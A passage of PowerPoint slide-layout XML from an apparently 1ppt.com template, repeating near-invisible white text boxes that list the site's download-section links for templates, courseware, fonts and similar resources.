              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout76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76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76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76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77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77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77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77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77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77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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout77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77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77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77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78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78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78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78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78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78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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout78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78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78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78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79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79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79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79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79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79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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
